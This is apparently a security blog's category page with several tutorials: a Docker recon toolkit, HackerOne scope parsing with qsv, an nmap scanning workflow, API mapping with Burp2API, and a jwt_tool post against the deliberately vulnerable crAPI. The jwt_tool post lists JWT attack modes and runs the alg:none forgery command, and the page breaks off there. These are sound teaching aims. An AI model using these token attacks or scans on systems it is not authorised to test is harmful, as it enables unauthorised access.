Category: Uncategorized

  • Building a Recon Toolkit with Docker

    Building a Recon Toolkit with Docker

    With the rise in popularity of bug bounty hunting, there’s been a lot of great tools developed. ProjectDiscovery‘s suite of tools and contributions made by Tomnomnom certainly come to mind.

    With the amount of tools, however, comes the complexity of managing them: keeping them up to date, making sure dependencies are installed, keeping your bounty tools separate from personal projects, and managing the clutter that comes with having tons of tools.

    The solution: Docker. Docker is a platform for running and managing containers. You can think of a container as a light-weight VM. That light-weight comes from sharing resources with your host machine instead of virtualizing lower-level functions (the kernel for example).

    With Docker, you can package all of your bug bounty tools inside of a container, which allows for:

    • Portability – your tools are guaranteed to run anywhere (so long as docker is installed).
    • Isolation – everything lives inside of the container. You don’t have to install/maintain unnecessary bloat on your host machine to get all of your tools working.
    • Easy cleanup – once the container is removed, the tools and their dependencies go with it. Getting everything up and running again is as easy as re-building/pulling the container.
    • Easy updates – If you do your setup right, updating all of your tools is as easy as removing then rebuilding the container. You don’t have to worry about anything else!

    I’m sure I sold you on the idea. Let’s get into how to practically do it!

    Containerizing your toolkit

    1. Setting the foundation

    I’m not going into how to install Docker or how to manage containers. They have their documentation I highly recommend reading if you’re new to Docker.

    For now, all you need to get started is a Dockerfile in a directory like this:

    $ mkdir recon-toolkit-demo
    $ cd recon-toolkit-demo
    $ touch Dockerfile

    Now, we can start adding to the Dockerfile.

    Every Dockerfile starts with a base layer using the FROM keyword. For my toolkit, I’m choosing to use a variant of Debian, for it’s ease of use and wide support. But, feel free to choose your favorite OS (as long as it’s unix-based 🙂 ).

    FROM debian:bookworm-slim

    This is all I need to build and run the container:

    $ docker build . -t recon-toolkit-demo
    $ docker run -it recon-toolkit-demo

    And just like that, you have your own Linux shell:

    root@26e0023b58e6:/# ls
    bin   dev  home  lib64	mnt  proc  run	 srv  tmp  var
    boot  etc  lib	 media	opt  root  sbin  sys  usr
    root@26e0023b58e6:/# 

    Pretty cool!

    2. Installing tools

    For demo purposes, I’m only going to install one tool. Everyone’s favorite sub-domain enumeration script: subfinder.

    Reading the install instructions, I first need to install go

    But before I even do that, I need curl so I can download go:

    root@26e0023b58e6:/# apt-get update && apt-get install curl -y

    Now that that’s taken care of, I can run through go’s install steps

    root@26e0023b58e6:/# curl 'https://dl.google.com/go/go1.25.6.linux-amd64.tar.gz' -O
    root@26e0023b58e6:/# rm -rf /usr/local/go && tar -C /usr/local -xzf go1.25.6.linux-amd64.tar.gz
    root@26e0023b58e6:/# export PATH=$PATH:/usr/local/go/bin
    root@26e0023b58e6:/# go version
    go version go1.25.6 linux/amd64
    

    Now we can install subfinder:

    root@26e0023b58e6:/# go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
    root@26e0023b58e6:/# export PATH=$PATH:/root/go/bin/         
    root@26e0023b58e6:/# subfinder --version
    [INF] Current Version: v2.12.0
    [INF] Subfinder Config Directory: /root/.config/subfinder

    Great! Now we have everything we need.

    The only problem is, when I re-build the container, none of the tools we installed will be there.

    To solve this, we just have to translate our manual install steps (which we verified work) into the Dockerfile:

    FROM debian:bookworm-slim
    RUN apt-get update && apt-get upgrade -y && apt-get install curl -y
    
    # go install
    RUN curl 'https://dl.google.com/go/go1.25.6.linux-amd64.tar.gz' -O 
    RUN rm -rf /usr/local/go && tar -C /usr/local -xzf go1.25.6.linux-amd64.tar.gz
    ENV PATH=$PATH:/usr/local/go/bin
    
    # subfinder install
    RUN go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest
    ENV PATH=$PATH:/root/go/bin/

    With the exception of ENV (which is pretty self-explanatory), everything looks the same as our manual setup steps.

    Now we can build the container again and run it to verify everything works:

    $ docker build . -t recon-toolkit-demo
    $ docker run -it recon-toolkit-demo
    root@d351c95c3742:/# subfinder --version
    [INF] Current Version: v2.12.0
    [INF] Subfinder Config Directory: /root/.config/subfinder

    Cool!

    Tip: Use docker run -it to debug and manually verify if something goes wrong.

    3. Install configurations

    subfinder is great out-of-box, but even better when you add API keys.

    To do this, you can specify a provider-config.yaml that is stored in by default in $CONFIG/subfinder/provider-config.yaml.

    To achieve this in docker we can use the COPY directive to transfer the file from our working directory to the container like so:

    $ touch provider-config.yaml
    $ echo 'COPY provider-config.yaml /root/.config/subfinder/provider-config.yaml' >> Dockerfile

    Of course, passing an empty provider-config.yaml won’t get you anywhere. You would need to specify your own keys. But this is how you would transfer config files into the container.

    4. Binding to a workspace

    Usually when I do my bounty recon, I like to keep all of my recon files on my host machine. That way, they’re persisted and I can process them using other tools I have installed on my machine.

    To do this, you can create a dedicated directory on the container for bounty recon files by adding this to the Dockerfile:

    RUN mkdir /bounty

    Then, you can run the container (after re-building) with the --mount argument:

    $ docker run -it --mount type=bind,source=/path/to/local/bounty_dir,target=/bounty recon-toolkit-demo

    Now, if you cd into the /bounty directory on the container, you should see your host’s system files!

    From there, you can run subfinder on any of your workspace files. And, if you pipe the output to a file, it will be saved on your local. The same behavior as if you had subfinder installed and running on your host!

    5. Automating

    Now we can run subfinder using docker manually, but eventually, you’re going to want to automate runs. Especially as your toolkit grows.

    To script this process, you can write a shell script:

    #!/bin/bash
    
    cat wildcards.txt | subfinder -o subdomains.txt


    and then COPY it over as we did earlier with provider-config.yaml:

    COPY recon.sh .
    RUN chmod +x recon.sh

    Now we can run the script on our bounty files:

    docker run -it --mount type=bind,source=/path/to/local/bounty_dir,target=/bounty recon-toolkit-demo ./recon.sh

    Conclusion

    Now you should be able to use docker package your bug bounty tools into a container.

    From here, you may want to:

    • Add more tools
    • Publish your container to Dockerhub
    • Add wrapper scripts for ease of use

    You can checkout my implementation on my github.

    Happy hacking!

  • Automating HackerOne Scope Parsing with qsv for Bug Bounty Recon

    Automating HackerOne Scope Parsing with qsv for Bug Bounty Recon

    Before you start bug hunting on a new program, you need to feed the right assets to the right tools for automated recon. Sorting through the scope and getting your environment setup is a tedious (and delicate) process.

    No one should want to do this manually. Especially since manual sorting can lead to mistakes. And you don’t want to make mistakes with staying in scope!

    So in this post, I’ll show you how to script this process with qsv.

    Note: HackerOne is the only bug bounty platform that provides scope as a CSV (that I know of). While these examples are HackerOne-specific, the parsing techniques are broadly useful anytime you’re working with structured data.

    How I organize recon

    When I start hacking on a web application, I separate their assets into 3 main text files:

    1. domains.txt – In-scope domains
    2. wildcards.txt – Domains that support wildcards (ex: *.example.com)
    3. urls.txt – URLs in-scope (including those resolved from the first two files)

    Pretty simple stuff. Sometimes I will create more files if I want more specificity (ex: apis.txt).

    This setup makes it easy to pass information to tools and chain them together for automated recon. More on that in a future post!

    This is the end goal for my environment setup. I’ll show you how to make this happen with qsv.

    Using qsv

    1. Viewing headers

    The first thing I do when parsing a qsv is looking at the headers. This is essentially the CSV’s schema.

    As an example, I’ll use Hubspot’s program scope.

    $ qsv headers hubspot_scope.csv
    1   identifier
    2   asset_type
    3   instruction
    4   eligible_for_bounty
    5   eligible_for_submission
    6   availability_requirement
    7   confidentiality_requirement
    8   integrity_requirement
    9   max_severity
    10  system_tags
    11  created_at
    12  updated_at

    Using headers, I can see the column number next to each header.

    2. Selecting relevant columns

    In this case, the most important columns for me are 1,2, and 5.

    I can do this with the select command:

    $ qsv select 1,2,5 hubspot_scope.csv | qsv table -w 1 -p 1 -c 20
    identifier              asset_type         eligible_for_submiss...
    api*.hubapi.com         WILDCARD           true
    *.hubspotemail.net      WILDCARD           true
    events.hubspot.com      URL                false
    *.hubspotpagebuilder... WILDCARD           true
    chatspot.ai             URL                true
    api*.hubspot.com        WILDCARD           true
    HubSpot Sales Office... OTHER              true
    thespot.hubspot.com     URL                false
    *.hubspotpagebuilder... WILDCARD           true
    connect.com             URL                false
    HubSpot Android Mobi... GOOGLE_PLAY_APP_ID true
    ir.hubspot.com          URL                false
    *.hs-sites(-eu1)?.co... WILDCARD           true
    trust.hubspot.com       URL                false
    Customer Portal         OTHER              true
    Customer Connected D... OTHER              true
    app*.hubspot.com        WILDCARD           true
    shop.hubspot.com        URL                false
    HubSpot iOS Mobile A... APPLE_STORE_APP_ID true
    Other HubSpot-owned ... OTHER              true
    

    I also used the table command to format the output (with some extra arguments to make the data fit on smaller screen sizes). For information on a specific command, you can use qsv <command> --help.

    As you can see, qsv accepts input from stdin which makes it pipeable! Another reason to love it.

    3. Filtering

    Obviously I only want to pass assets that are in-scope to automated tools. And not all assets are created equal.

    This is where filtering comes in to play.

    For example, only wildcard domains go into wildcards.txt. To grab only in-scope wildcards, I can use the search command:

    qsv search -s 5 true hubspot_scope.csv| qsv search -s 2 WILDCARD | qsv select 1
    identifier
    api*.hubapi.com
    *.hubspotemail.net
    *.hubspotpagebuilder.eu
    api*.hubspot.com
    *.hubspotpagebuilder.com
    *.hs-sites(-eu1)?.com
    app*.hubspot.com

    Great, now I have what I want. But it’s not ready to be passed to a tool. Which, is where the next step comes in.

    4. Processing

    For wildcards.txt, I’m after wildcards that begin with *.. I also don’t want to include the *. in the file.

    Doing that is easy enough with built-in tools:

    $ qsv search -s 5 true hubspot_scope.csv | qsv search -s 2 WILDCARD | qsv slice -n -s 1 | qsv select 1 | grep '^\*\.' | grep -v \( | sed 's/\*\.//'
    hubspotemail.net
    hubspotpagebuilder.eu
    hubspotpagebuilder.com

    I know it looks scary, but I’m just using slice to get rid of the headers, grep to get wildcards with leading .* (for gathering subdomains), and sed to chop-off the wildcard bit (because subfind3r doesn’t process that).

    You can see that this process can get complicated fast. Which is where the final step comes in!

    5. Scripting

    It can be a pain to memorize these commands and one-liners are messy. Luckily, qsv is highly scriptable.

    For example, I can get wildcards and domains easily with this script:

    #!/bin/bash
    
    get_asset() {
        qsv search -s 5 true hubspot_scope.csv | qsv search -s 2 "$1" | qsv slice -n -s 1 | qsv select 1
    }
    
    parse_sub() {
        grep '^\*\.' | grep -v \( | sed 's/\*\.//'
    }
    
    parse_domain() {
        grep -Ev '^https?://'
    }
    
    get_asset URL | parse_domain > domain.txt
    get_asset WILDCARD | parse_sub > wildcard.txt

    Now, any time the scope changes, I can just run this script and run my tools again instead of copy-pasting.

    It’s also best practice to make this more general so it can work with other programs. With a strong knowledge of qsv, you can tailor your script to your needs for more efficient and safer recon.

    Conclusion

    Setting up an environment for automated recon and staying in scope can be a painful task. But, qsv can take most of that pain away.

    Hopefully you got enough of a taste of qsv to be able to use it confidently on your bug bounty endeavors.

    Thanks for reading and happy hunting!

  • Effective Network Scanning with Nmap: A Practical Workflow

    Effective Network Scanning with Nmap: A Practical Workflow

    There’s a ton of content about the network mapping tool, nmap, and rightfully so. It’s a powerful tool in the hands of a capable user.

    But most of the tutorials out there are just regurgitations of the man page or docs in various forms. Many only cover basic usage of the tool that can be learned by typing nmap -h.

    So, in this post, I’m going to take a more practical approach by showing you how to efficiently scan a network from the host discovery phase to in-depth enumeration.

    Host discovery

    Before we start scanning ports, we need to know what hosts are available to scan.

    We can do that by telling nmap to omit the port scan and just do host discovery with -sn:

    $ sudo nmap -sn 192.168.1.0/24 -oA host_discovery
    
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (0.0042s latency).
    MAC Address: DC:62:79:**:**:** (Unknown)
    Nmap scan report for 192.168.1.2
    Host is up (0.087s latency).
    MAC Address: 16:1A:32:**:**:** (Unknown)
    Nmap scan report for 192.168.1.90
    Host is up (0.11s latency).
    MAC Address: B8:A1:75:**:**:** (Roku)
    Nmap scan report for [hostname redacted] (192.168.1.171)
    Host is up (0.18s latency).
    MAC Address: C0:35:32:**:**:** (Liteon Technology)
    Nmap scan report for 192.168.1.231
    Host is up (0.098s latency).
    MAC Address: C2:3D:99:**:**:** (Unknown)
    Nmap scan report for 192.168.1.58
    Host is up.
    Nmap done: 256 IP addresses (6 hosts up) scanned in 3.33 seconds

    Now, we have a list of live hosts available for scanning.

    You may have noticed that I used -oA to save the output to all nmap supported output types: normal, greppable, and XML. I’d rather save the output into extra formats I may not use instead of missing a format and having to rescan.

    As a pentester, time is more valuable than disk space.

    Scanning

    Now that we know what hosts are available on the network, we can begin scanning for open ports.

    To make this easy, I put the IPs of the live hosts in a file by parsing the greppable output from earlier:

    $ grep 'Host:' host_discovery.gnmap | cut -d ' ' -f 2 | tee live_hosts.txt
    
    192.168.1.1
    192.168.1.2
    192.168.1.90
    192.168.1.171
    192.168.1.231
    192.168.1.58

    This way, I can pass nmap the file instead of typing out each host. You can see how tedious this would be if I were scanning a much larger network with hundreds of hosts.

    Initial port scan

    Now that we have some live targets, it’s time to start scanning.

    Using the -iL option, I can directly pass the list of live hosts to nmap:

    $ sudo nmap -iL live_hosts.txt -sT -F -Pn -oA fast_scan_all_hosts
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    
    Nmap scan report for 192.168.1.1
    Host is up (0.034s latency).
    Not shown: 96 closed tcp ports (conn-refused)
    PORT     STATE SERVICE
    53/tcp   open  domain
    80/tcp   open  http
    443/tcp  open  https
    1900/tcp open  upnp
    ...
    
    Nmap scan report for 192.168.1.231
    Host is up (0.020s latency).
    Not shown: 99 closed tcp ports (conn-refused)
    PORT      STATE SERVICE
    49152/tcp open  unknown
    
    ...

    For brevity, I only included the hosts that returned open ports.

    You may have noticed that I used the -F option in this scan. This makes nmap only scan the top 100 most common (according to statistical data) ports. Otherwise, nmap would scan for the top 1000 ports.

    I limit the scan significantly for speed because I plan on using this information to prioritize targets for more in-depth analysis.

    Just a few open ports can reveal a lot about a host’s role within a network. In this example, it is clear that the 192.168.1.1 system is a router. It has web ports 80 and 443 open, which is likely an admin interface. 1900 is also Universal Plug N Play, a protocol commonly used by residential routers to easily connect devices.

    On an enterprise network, this similar train of thought could help you identify web servers, workstations, databases, file servers, and domain controllers that may be more critical targets to attack than, for example, mail servers and printers.

    It’s also worth noting that you can adjust the depth of this initial scan depending on how many hosts you’re scanning at once. If you have hundreds of hosts to scan, you may want to use --top-ports to scan fewer hosts:

    sudo nmap -Pn -iL live_hosts.txt -sT --top-ports 50 -oA fast_scan_all_hosts

    Or, if you’re seeking specific targets, like web servers for example, you can supply ports with -p:

    sudo nmap -iL live_hosts.txt -sT -p 53,80,443,3006,8080 -Pn -oA fast_scan_all_hosts

    You have control depending on the context of the network you are scanning. That is the beauty of using nmap modularly in this way!

    Those of you with keen eyes may have also noticed that I used -sT to use a full TCP connect scan instead of the default -sS (SYN) scan. I chose this because flooding a network with SYN packets can trigger alerts. I picked this tip up from Tim Medin’s Sec560 course on SANS.

    Full port scan

    Now that we’ve picked out targets to scan, it’s time to discover more ports.

    Specifically, I want to scan all of the ports on each of my selected targets. Or, at least more than my initial scan, depending on the context (remember, you have the power)!

    For the sake of this example, I’ll just scan the router:

    $ sudo nmap -Pn -sT -p- --open 192.168.1.1 -oA all_ports_1
        
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (1.1s latency).
    Not shown: 56546 closed tcp ports (conn-refused), 8985 filtered tcp ports (no-response)
    Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
    PORT      STATE SERVICE
    53/tcp    open  domain
    80/tcp    open  http
    443/tcp   open  https
    20001/tcp open  microsan
    
    Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds

    I used -p- as a shortcut for all 65,535 ports. And it paid off because I discovered a new port to probe!

    This is why it’s important to consider all ports. Although it may take some extra time, you may find uncommon (and potentially less secure) open ports.

    Now it’s time to go even deeper and enumerate the ports.

    Deep scan

    nmap has some amazing enumeration capabilities. We’ll save more advanced scanning for a later post, since there is a lot to cover there.

    For now, a version+script scan with -sVC will suffice:

    $ sudo nmap -Pn -sVC -p 53,80,443,20001 192.168.1.1 -oA version_script_1
    
    Starting Nmap 7.95 ( https://nmap.org ) at [timestamp]
    Nmap scan report for 192.168.1.1
    Host is up (0.0061s latency).
    
    PORT      STATE SERVICE    VERSION
    53/tcp    open  tcpwrapped
    | dns-nsid: 
    |   NSID: rochnyei-dns-cac-308 (726f63686e7965692d646e732d6361632d333038)
    |   id.server: rochnyei-dns-cac-308
    |_  bind.version: Akamai Vantio CacheServe 7.7.3.0.d
    80/tcp    open  http       BusyBox http 1.19.4
    |_http-title: Site doesn't have a title (text/html).
    443/tcp   open  ssl/http   BusyBox http 1.19.4
    | ssl-cert: Subject: commonName=tplinkwifi.net/countryName=CN
    | Subject Alternative Name: DNS:tplinkwifi.net, IP Address:192.168.1.1
    | Not valid before: 2010-01-01T00:00:00
    |_Not valid after:  2030-12-31T00:00:00
    |_http-title: Site doesn't have a title (text/html).
    20001/tcp open  ssh        Dropbear sshd 2019.78 (protocol 2.0)
    MAC Address: DC:62:79:DB:24:C8 (Unknown)
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
    
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 44.24 seconds
                                                                  

    I supplied only the open ports detected earlier during the full scan with -p.

    -sVC is a short hand for:

    • -sV: Version scan. nmap probes the port to get the service version.
    • -sC: Script scan. Uses a set of scripts part of the Nmap Script Engine to enumerate ports.

    As you can see, this gave us tons of juicy info! Let’s go over what we learned about this device:

    • This is a TP-Link router based on the SSL certificate’s common name
    • The mystery port (20001) is running ssh
    • It’s running some form of Linux

    We could probe further and look up versions for more information or potential known vulnerabilities. But this is an excellent start!

    Where to go from here…

    As you can see, nmap is a very powerful scanning tool when used effectively. We were able to find a lot of information from just a few scans.

    But this is just the beginning! You’ll want to repeat the process with more hosts. And the beauty of this modular system is that you can adjust each step to suit your needs.

    After scanning more hosts, you’ll have a pretty good idea of which hosts you want to dig into and eventually exploit. Luckily, nmap has some incredible enumeration and scripting capabilities that can make it a great tool for the job. I promise I’ll do an nmap scripting deep dive later.

    If you’re saving every scan in multiple formats (as you should), things can get messy fast. Fortunately, tools like Metasploit can import nmap XML output to help manage and analyze your findings. I’ll cover that soon.

    Hope you enjoyed this, and stay tuned for more related content!

  • Reverse Engineering APIs with Burp2API

    Reverse Engineering APIs with Burp2API

    Postman is one of my favorite tools for testing the functionality and security of APIs. It allows you to organize API routes neatly and write/run automated tests across collections of requests.

    If you have access to the API spec of an application you are testing, you can easily import the mapped API directly into Postman in a structured fashion.

    But not all APIs have public spec files or even documentation. Sometimes, we have to fly a little blind.

    Well, not completely blind. We can use a proxy to capture the requests that form the API.

    The Process

    There are many proxies to choose. From the CLI tool mitmproxy to the feature-packed hacking tool, Burpsuite. It doesn’t matter which one you choose; they all serve the same purpose: capturing web traffic.

    The tricky part is getting that captured data into Postman in an organized fashion.

    Postman does have a proxy built in, which, although convenient, doesn’t organize the routes the way importing API spec would.

    I used to use a technique I learned in APIsec University’s API Pentesting Course that involved using mitmproxy to capture the traffic, then mitmproxy2swagger to turn the captured data into API spec.

    This worked well, but I’m not the biggest fan of mitmproxy. I like using Burpsuite to manage my testing and found myself flipping back and forth between them.

    I then stumbled upon this Burp extension that exported selected requests into a Postman collection format. But it didn’t do any formatting or structuring.

    There had to be a better way…

    Enter Burp2API

    Then, while I was thinking about developing my own tool, I stumbled upon this little gem: Burp2API. It’s a Python script that converts exported requests from Burpsuite into the OpenAPI spec format.

    My prayers had been answered!

    It’s basically mitmproxy2swagger but with the added benefit of not being dependent on mitmproxy.

    Why not just use mitmproxy?

    Don’t get me wrong, mitmproxy is a great tool, and I’m sure you CLI cronies out there swear by it. But there are numerous benefits to using Burpsuite over it.

    Firstly, it’s great for project management. You can specify a scope, make observations with Burp Organizer, and track any issues Burp automatically identifies.

    Secondly (and probably the most important), you have automated mapping capabilities. You can use Burp to scan and crawl to find endpoints you may miss by relying on manual browsing alone.

    Lastly, as a pentester, you will undoubtedly go back to Burp after your initial exploration phase. So, why not just stay there? That way, you can keep all of your gathered traffic in one place for more convenient analysis later.

    At the end of the day, we’re hackers. It makes sense to use the best tool for the job.

    I’m also big on simplicity. So, if I can get the same or better results using fewer tools, that’s a win for me. Plus, I’d rather be an expert with a few tools than skim the surface with many.

    Reverse Engineering crAPI

    For demonstration purposes, I’ll be using OWASP’s crAPI. crAPI is an intentionally vulnerable API. I love it because it’s built with a modern front end, making it feel more realistic.

    I highly recommend sharpening your skills with crAPI. As a realistic target, it allows you to practice the hacker mindset, rather than just regurgitating the exact steps you need to follow to solve a level in a CTF-like environment.

    So, let’s put our hacking caps on and dive in!

    Step 1: Manually gathering traffic

    The first step in our reverse engineering journey involves browsing the application as a normal user might. Nothing too glamorous.

    However, we’ll be running Burpsuite in the background so we can get a more in-depth look at how the application is working behind the scenes.

    I’m not going to go in-depth about how to set up Burp as a proxy, so here’s an article on that.

    The goal here is to cover every function of the app:

    • Signing in
    • Uploading profile pictures
    • Buying products
    • Commenting on posts
    • Resetting the account password

    Whatever the app allows us to do, we’re going to do.

    Remember, we’re not looking to break anything just yet, but don’t let that stop you from thinking about potential attack vectors while getting to know the app.

    Just by creating an account and signing into crAPI, I’m able to get an idea of how the API is structured:

    I’ve heard the argument that you should spend a ton of time getting to know the target application before you even fire up any hacking tools. While I partially agree with this sentiment, I believe that you should always have Burp running in the background as soon as you start browsing the app.

    You may capture requests or find some functionality that you would miss if you do a second pass with Burpsuite. Plus, Burpsuite passively scans captured traffic, so the more data, the better.

    Step 2: Discover more routes

    After exhausting manual exploration, it’s time to let Burp take the reins. There are a couple of ways that we can do this within Burp:

    1. Using a scan to crawl the application
    2. Using extensions

    Launching a scan with Burp

    To use Burp’s scanning capabilities, go to the Dashboard and click the New scan button:

    A window will pop up, asking us to choose a scan type. For our purposes (discovering more routes), I’ll select the Crawl option:

    The other two options actively scan the target, which is noisier and will take longer. I highly recommend exploring those, but be wary that a WAF would most likely start blocking your traffic (or more annoyingly, ban your IP) if you get too noisy.

    Next, add a list of URLs to scan.

    I’m skipping the scan and Resource pool configuration for simplicity. So, the last item we’ll configure is the Application login section. I’ll add my login credentials here:

    This allows the crawler to use the specified credentials whenever it finds a login form. Burp will be able to travel deeper into the application this way.

    Without filling this out, it would just crawl the login page.

    Now, we’ll hit the “Scan” button and let Burp explore the app for us.

    Once the crawl finished, the summary page revealed that it found some new routes:

    Burp even handily adds these to our Sitemap for us. How cool!

    Using JSLinkFinder

    Burpsuite’s crawler is just one tool we can use to discover more endpoints.

    Instead of crawling the site, we can also parse the JavaScript for links using JSLinkFinder.

    JSLinkFinder passively parses JS responses, so it most likely gathered links during the manual exploration phase. But, for demo purposes, I’ll show you how to trigger it incase it didn’t.

    In the Proxy’s History tab, select the JavaScript responses, right click them, then select Do a passive scan:

    We can see that JSLinkFinder found some links in the BurpJSLinkFinder tab:

    These will be automatically added to our sitemap. Unfortunately, since these are all out of scope, they won’t be of much use to us. But, it’s always good to explore options.

    Now that we collected routes manually and automatically, it’s on to phase 3!

    Step 3: Export the endpoints

    I like to use the Sitemap in the Target tab when exporting API requests. It gives me a structured look at the API.

    From the manual phase, we know that the crAPI API endpoints all contain api in the URL. We can filter the site map to get a more refined look at the API:

    Much better. This is exactly what I want to be reflected in Postman:

    To export the API routes, all we need to do now is right-click on the top-level URL and select Save selected items:

    Save the file in a convenient location.

    Note: There is an option to encode the requests/response data in base64. You can leave that on. Bupr2API does the decoding for us.

    Now, we can leave Burp and head over to the command line.

    Step 4: Converting to API spec

    Finally, it’s time to use burp2api!

    It’s as easy as running the python script and supplying the file as an argument:

    $ burp2api.py crapi-api.req
    Output saved to output/crapi-api.req.json
    Modified XML saved to crapi-api.req_modified.xml

    The output is saved in an output directory along with a second file. I moved the JSON file out of there and renamed it for convenience’s sake:

    cp output/crapi-api.req.json ../crapi-api-spec.json

    Now, we can upload it to the online swagger editor just like any old spec file:

    So simple and cool!

    Now it’s time to import this into Postman:

    Step 5: Importing to Postman

    Open up Postman in a fresh workspace. Then, click the Import button at the top.

    You can also just drag and drop the file anywhere in the window:

    When prompted, choose the option to import as OpenAPI 3.0:

    And finally, click Import.

    Now, you should have a beautifully organized mapping of the API in Postman:

    Why not just stay in Burpsuite?

    You may be wondering why we went through the effort of migrating to Postman when we had all the data we needed in Burp structured exactly the way we wanted.

    Ok, you might not have, but I’ll explain the method to my madness anyways.

    This method of reverse engineering is great for when you are running continuous, structured security tests on a single API.

    For example, at my job, the application I am testing makes use of an internal API. This API doesn’t have documentation or a spec file, so I would need to reverse engineer it to get the structure mapped out.

    As a Quality Engineer, I need to continuously test the API to make sure that changes don’t introduce bugs or security flaws during each development cycle. Postman is great for automating this process as I can write automated tests, then run them on a nightly basis using a cron-job to ensure stability.

    If you’re a pentester or bug bounty hunter, it may be more worth your time to just stay in Burp as you’re not likely going to be monitoring the API for the long-term.

    In short, make sure you understand the context of your testing and choose what works best for you.

    Conclusion

    I hope you gained something from reading this!

    This is typically the method I use for mapping as well as reverse-engineering APIs. So, you kind of got a two-for-one deal in this post!

    I personally like this better than the mitmproxy -> mitmproxy2swagger approach. It’s simpler and removes my dependency on mitmproxy. Fewer tools, yay!

    Please try this out for yourself against crAPI. Reading this post once and forgetting about it isn’t going to make you a better tester.

    So, practice, practice, PRACTICE!

    I also recommend you read Portswigger’s documentation on Burpsuite (even if you’re already familiar with the tool). The part walking through the pentest workflow using Burpsuite is highly valuable.

    Also, explore the courses in APISec University if you’re new or even an intermediate web/API hacker.

    Both of these resources are FREE so take advantage of them.

    I wish you the best on your security journey! Keep learning!

  • Exploiting crAPI with jwt_tool

    Exploiting crAPI with jwt_tool

    In this post, I’ll show you how to use jwt_tool to analyze and exploit JWT vulnerabilities in crAPI, an intentionally vulnerable API.

    We’re going to take a practical approach to learning how to use this tool. So, by the end of this, you’ll be able to use this tool in the real world.

    Let’s dive in!

    Brief Introduction to JWTs

    If you’re already familiar with JWTs, feel free to skip this section.

    A JWT (JSON Web Token) is a token format used for authentication and authorization. It consists of three parts:

    1. Header – Contains metadata about the token, including the algorithm used for signing.
    2. Payload – Contains claims (e.g., user ID, role, expiration time).
    3. Signature – Ensures token integrity and authenticity.

    JWTs can be signed with symmetric or asymmetric encryption. Poor implementation can lead to security vulnerabilities, which we’ll explore using jwt_tool.

    Intercepting a JWT

    To begin, we need to capture the JWT from crAPI. I created a test account and logged in to get a valid one. Then, you can use browser dev tools or an intercepting proxy to see requests using JWTs.  In my case, I used the network tab in Firefox’s dev tools:

    In this case, the JWT is stored in Authorization header after the Bearer keyword.

    The JWT won’t always be in the headers. It can also be stored in the body or in cookies. Usually, the leading ey and . ‘s separating the sections is a giveaway that a JWT is in use.

    Passing the token to jwt_tool will tell us if this is a JWT for sure:

    $ jwt_tool eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw
    
            \   \        \         \          \                    \ 
       \__   |   |  \     |\__    __| \__    __|                    |
             |   |   \    |      |          |       \         \     |
             |        \   |      |          |    __  \     __  \    |
      \      |      _     |      |          |   |     |   |     |   |
       |     |     / \    |      |          |   |     |   |     |   |
    \        |    /   \   |      |          |\        |\        |   |
     \______/ \__/     \__|   \__|      \__| \______/  \______/ \__|
     Version 2.2.7                \______|             @ticarpi      
    
    Original JWT: 
    
    =====================
    Decoded Token Values:
    =====================
    
    Token header values:
    [+] alg = "RS256"
    
    Token payload values:
    [+] sub = "sambam@test.com"
    [+] iat = 1738376057    ==> TIMESTAMP = 2025-01-31 18:14:17 (UTC)
    [+] exp = 1738980857    ==> TIMESTAMP = 2025-02-07 18:14:17 (UTC)
    [+] role = "user"
    
    Seen timestamps:
    [*] iat was seen
    [*] exp is later than iat by: 7 days, 0 hours, 0 mins
    
    ----------------------
    JWT common timestamps:
    iat = IssuedAt
    exp = Expires
    nbf = NotBefore
    ----------------------
    

    Key Takeaways

    The alg field is RS256, an asymmetric algorithm.

    The payload contains:

    • User email (sub)
    • Role (role)
    • Expiration (exp) and issued-at (iat) timestamps.

    The token expires in exactly one week, making it more vulnerable if stolen.

    Now that we know the structure of the JWT, we can move on to attempting to exploit it.

    Attacking JWTs with jwt_tool

    jwt_tool supports several known vulnerabilities:

    -X EXPLOIT, --exploit EXPLOIT
      a = alg:none
      n = null signature
      b = blank password accepted in signature
      s = spoof JWKS
      k = key confusion
      i = inject inline JWKS
    

    Implementing common attacks

    Implementing the tack is as easy as specifying the type after -X and passing the token:

    $ jwt_tool -X a eyJhbGciOiJSUzI1NiJ9.eyJzdWIiOiJzYW1iYW1AdGVzdC5jb20iLCJpYXQiOjE3MzgzNzYwNTcsImV4cCI6MTczODk4MDg1Nywicm9sZSI6InVzZXIifQ.O7iaSrVUkDfGI3GrXmcPj561X5ktpwNuUrIrVtsdxOP42oD-FUK5WrYKTBIKw90spR593nMu93E9LsbhJ0sDftx3X2ahlLdt6OQELxRsx2lXbg4fTk0WSUnB8jWon4Fo1LKO5NjD8kt8hzxRfvG33J_RkOq1uQmtsjanuDdSFTFg8X-BcBdHNmRPeE7vEqtYTotp_vma68ZnW4coq2AwaHIjJnDiI_fC2lm-6dsFniX99n15ar0T9md4VfIHoIiT7YfH6BddhNNg8Y58TQHEGH6jxR-EA0NF2xDsrUKM4Sowa7T3jR6-rj4j961h-k5boeTZUeNiNiFEf-AV6qimUw      
    
    Original JWT: 
    
